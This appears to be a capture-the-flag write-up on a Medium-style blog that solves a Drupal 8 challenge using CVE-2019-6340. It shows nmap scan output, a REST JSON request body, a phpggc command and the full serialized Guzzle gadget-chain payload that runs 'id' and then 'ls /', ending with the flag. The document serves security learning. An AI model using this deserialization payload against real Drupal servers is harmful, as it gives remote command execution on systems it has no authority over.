Not so Blin D Rush CVE-2019-6340

The CVE

Insecure Deserialization

Source : https://portswigger.net/web-security/deserialization

Challenge Solution

Blog Post by Optimus Prime
nmap -p 80 -T4 -A hostStarting Nmap 7.80 ( https://nmap.org ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
{
"link": [
{
"value": "link",
"options": "<SERIALIZED_CONTENT>"
}
],
"_links": {
"type": {
"href": "http://website.com/rest/type/shortcut/default"
}
}
}
phpggc guzzle/rce1 system id --jsonO:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}
The function unserialize() gets triggered code is executed
s:2:\”id\”
s:4:\”ls /\”
Contents of / directory
flag{blindrush_s@m_witwicky_is_0ur_l@st_h0p3}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tushar Kulkarni

Tushar Kulkarni

Security Enthusiast | A Web App Developer Sometimes